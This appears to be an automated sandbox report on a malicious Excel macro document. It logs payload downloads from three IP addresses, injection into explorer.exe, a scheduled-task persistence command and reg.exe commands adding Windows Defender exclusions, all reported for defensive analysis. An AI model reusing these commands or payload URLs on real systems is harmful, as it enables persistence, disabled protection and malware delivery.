    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2008 base: AE102D value: E9 BA 4C 5A FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2608 base: AE102D value: E9 BA 4C 5A FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2540 base: AE102D value: E9 BA 4C 5A FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 408 base: AE102D value: E9 BA 4C 5A FF
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2920Thread sleep count: 48 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2216Thread sleep time: -100000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep count: 52 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2648Thread sleep count: 72 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2932Thread sleep count: 56 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2596Thread sleep count: 53 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2636Thread sleep count: 45 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2636Thread sleep time: -104000s >= -30000s
    Source: C:\Windows\SysWOW64\explorer.exe TID: 788Thread sleep count: 73 > 30
    Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].datJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000DFAD LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_02834495 or ebx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_00D84495 or ebx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00085A61 RtlAddVectoredExceptionHandler,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Maps a DLL or memory area into another processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Writes to foreign memory regionsShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: AE102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: AE102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: AE102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: AE102D
    Allocates memory in foreign processesShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Injects code into the Windows Explorer (explorer.exe)Show sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2008 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2008 base: AE102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2608 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2608 base: AE102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2540 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2540 base: AE102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 408 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 408 base: AE102D value: E9
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Compensation-1730406737-09272021.xls, type: SAMPLE
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: explorer.exe, 00000005.00000002.705503167.0000000000D90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000005.00000002.705503167.0000000000D90000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: explorer.exe, 00000005.00000002.705503167.0000000000D90000.00000002.00020000.sdmpBinary or memory string: Program Manager<
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000831C2 CreateNamedPipeA,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter11Scheduled Task/Job1Process Injection413Masquerading121Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsScripting2Logon Script (Windows)Logon Script (Windows)Modify Registry1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsNative API3Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion1NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
    Cloud AccountsExploitation for Client Execution32Network Logon ScriptNetwork Logon ScriptProcess Injection413LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting2Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 491509 Sample: Compensation-1730406737-092... Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 71 Document exploit detected (drops PE files) 2->71 73 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->73 75 Sigma detected: Schedule system process 2->75 77 7 other signatures 2->77 9 EXCEL.EXE 194 38 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 65 190.14.37.178, 49165, 80 OffshoreRacksSAPA Panama 9->65 67 185.183.96.67, 49166, 80 HSAE Netherlands 9->67 69 185.250.148.213, 49167, 80 FIRSTDC-ASRU Russian Federation 9->69 59 C:\Users\user\...\44466.7022844907[3].dat, PE32 9->59 dropped 61 C:\Users\user\...\44466.7022844907[2].dat, PE32 9->61 dropped 63 C:\Users\user\...\44466.7022844907[1].dat, PE32 9->63 dropped 93 Document exploit detected (UrlDownloadToFile) 9->93 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        file5 signatures6 process7 signatures8 27 regsvr32.exe 18->27         started        30 regsvr32.exe 20->30         started        32 regsvr32.exe 22->32         started        85 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->85 87 Injects code into the Windows Explorer (explorer.exe) 24->87 89 Writes to foreign memory regions 24->89 91 2 other signatures 24->91 34 explorer.exe 8 1 24->34         started        process9 file10 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 27->95 97 Injects code into the Windows Explorer (explorer.exe) 27->97 99 Writes to foreign memory regions 27->99 37 explorer.exe 8 1 27->37         started        101 Allocates memory in foreign processes 30->101 103 Maps a DLL or memory area into another process 30->103 40 explorer.exe 30->40         started        43 regsvr32.exe 30->43         started        45 explorer.exe 32->45         started        53 C:\Users\user\Drezd.red, PE32 34->53 dropped 105 Uses cmd line tools excessively to alter registry or file data 34->105 47 reg.exe 1 34->47         started        49 reg.exe 1 34->49         started        signatures11 process12 file13 79 Uses cmd line tools excessively to alter registry or file data 37->79 81 Drops PE files to the user root directory 37->81 83 Uses schtasks.exe or at.exe to add and modify task schedules 37->83 51 schtasks.exe 37->51         started        55 C:\Users\user\Drezd2.red, PE32 40->55 dropped 57 C:\Users\user\Drezd1.red, PE32 45->57 dropped signatures14 process15

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Compensation-1730406737-09272021.xls0%VirustotalBrowse

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat100%Joe Sandbox ML

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.%s.comPA0%URL Reputationsafe
    http://190.14.37.178/44466.7022844907.dat0%Avira URL Cloudsafe
    http://185.250.148.213/44466.7022844907.dat0%Avira URL Cloudsafe
    http://185.183.96.67/44466.7022844907.dat0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://190.14.37.178/44466.7022844907.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://185.250.148.213/44466.7022844907.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://185.183.96.67/44466.7022844907.datfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.%s.comPAregsvr32.exe, 00000004.00000002.421225157.0000000001FC0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.705650290.00000000023C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.431427625.0000000002200000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000002.433161953.0000000002190000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    		low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.421225157.0000000001FC0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.705650290.00000000023C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.431427625.0000000002200000.00000002.00020000.sdmpfalse
      		high
      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.422807773.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.420832394.0000000001BC0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.433067223.0000000001CC0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.430171202.0000000000950000.00000002.00020000.sdmpfalse
      • Avira URL Cloud: safe
      		low

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      185.183.96.67
      		unknownNetherlands
      		60117HSAEfalse
      190.14.37.178
      		unknownPanama
      		52469OffshoreRacksSAPAfalse
      185.250.148.213
      		unknownRussian Federation
      		48430FIRSTDC-ASRUfalse

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:491509
      Start date:27.09.2021
      Start time:16:50:18
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 13m 13s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:Compensation-1730406737-09272021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:25
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@33/12@0/3
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 20.4% (good quality ratio 18.8%)
      • Quality average: 74.7%
      • Quality standard deviation: 29.3%
      HCA Information:
      • Successful, ratio: 83%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
      • TCP Packets have been reduced to 100
      • Not all processes where analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      16:51:23API Interceptor62x Sleep call for process: regsvr32.exe modified
      16:51:25API Interceptor888x Sleep call for process: explorer.exe modified
      16:51:27API Interceptor1x Sleep call for process: schtasks.exe modified
      16:51:28Task SchedulerRun new task: fpdnnxq path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      HSAEKHI13mrm4c.exeGet hashmaliciousBrowse
      • 185.183.98.2
      Copy of Payment-228607772-09222021.xlsGet hashmaliciousBrowse
      • 185.82.202.248
      NJS4hNBeUR.exeGet hashmaliciousBrowse
      • 185.198.57.68
      rQoEGMGufv.exeGet hashmaliciousBrowse
      • 185.45.192.203
      5ya8R7LxXl.exeGet hashmaliciousBrowse
      • 185.45.192.203
      Uz2eSldsZe.exeGet hashmaliciousBrowse
      • 185.45.192.203
      SWIFT_COPY.htmGet hashmaliciousBrowse
      • 194.36.191.196
      3hTS09wZ7G.exeGet hashmaliciousBrowse
      • 185.183.96.3
      040ba58b824e36fc9117c1e3c8b651d9e4dc3fe12b535.exeGet hashmaliciousBrowse
      • 185.183.96.3
      OC2Z0JbqfA.exeGet hashmaliciousBrowse
      • 185.183.96.3
      89o9iHBGiB.exeGet hashmaliciousBrowse
      • 185.183.96.3
      DWVByMCYL8.exeGet hashmaliciousBrowse
      • 185.183.96.3
      DUpgpAnHkq.exeGet hashmaliciousBrowse
      • 185.183.96.3
      7EAz8cQ49v.exeGet hashmaliciousBrowse
      • 185.183.96.3
      f9aoawyl4M.exeGet hashmaliciousBrowse
      • 185.183.96.3
      7da1ac7cd7a61715807d49e8c79b054ba302b3988ba19.exeGet hashmaliciousBrowse
      • 185.183.96.3
      38fd2cb3083f33b50606b7821453769103bde24335734.exeGet hashmaliciousBrowse
      • 185.183.96.3
      JSYInjvdnM.exeGet hashmaliciousBrowse
      • 185.183.96.3
      KlErfuBsH2.exeGet hashmaliciousBrowse
      • 185.183.96.3
      qB6P2WfUjb.exeGet hashmaliciousBrowse
      • 185.183.96.3

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):4.528544078109707
      Encrypted:false
      SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2M5:vs6Xpq0H3Jhds/9+qC/zfTPLv
      MD5:4B0D7EAB4203C3E8CF8ABA423AEB4167
      SHA1:BB53264B45F27738AD5A89CB304C129C35044D20
      SHA-256:09E68587EEE29DF07C5893F10FBA90EF9032C4901785C62D4D154CACFDD2D20A
      SHA-512:7E0CAB00C3A0E14BD07314F46A824F5166391FD0A15B55C0E4CD04F7C9CA9E630818576A8651B9ABF0141E9F1E54B820441D543F45733F2B0EFE11BBC413DBA0
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):4.528544078109707
      Encrypted:false
      SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2M5:vs6Xpq0H3Jhds/9+qC/zfTPLv
      MD5:4B0D7EAB4203C3E8CF8ABA423AEB4167
      SHA1:BB53264B45F27738AD5A89CB304C129C35044D20
      SHA-256:09E68587EEE29DF07C5893F10FBA90EF9032C4901785C62D4D154CACFDD2D20A
      SHA-512:7E0CAB00C3A0E14BD07314F46A824F5166391FD0A15B55C0E4CD04F7C9CA9E630818576A8651B9ABF0141E9F1E54B820441D543F45733F2B0EFE11BBC413DBA0
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):4.528544078109707
      Encrypted:false
      SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2M5:vs6Xpq0H3Jhds/9+qC/zfTPLv
      MD5:4B0D7EAB4203C3E8CF8ABA423AEB4167
      SHA1:BB53264B45F27738AD5A89CB304C129C35044D20
      SHA-256:09E68587EEE29DF07C5893F10FBA90EF9032C4901785C62D4D154CACFDD2D20A
      SHA-512:7E0CAB00C3A0E14BD07314F46A824F5166391FD0A15B55C0E4CD04F7C9CA9E630818576A8651B9ABF0141E9F1E54B820441D543F45733F2B0EFE11BBC413DBA0
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):162688
      Entropy (8bit):4.254441838317247
      Encrypted:false
      SSDEEP:1536:C6IL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CpJNSc83tKBAvQVCgOtmXmLpLm4l
      MD5:70473B0C7F1A6F72E5CC4E6AEAED2A71
      SHA1:DF5905D6593A8FDCCE2B294D7E18802B512F6F0D
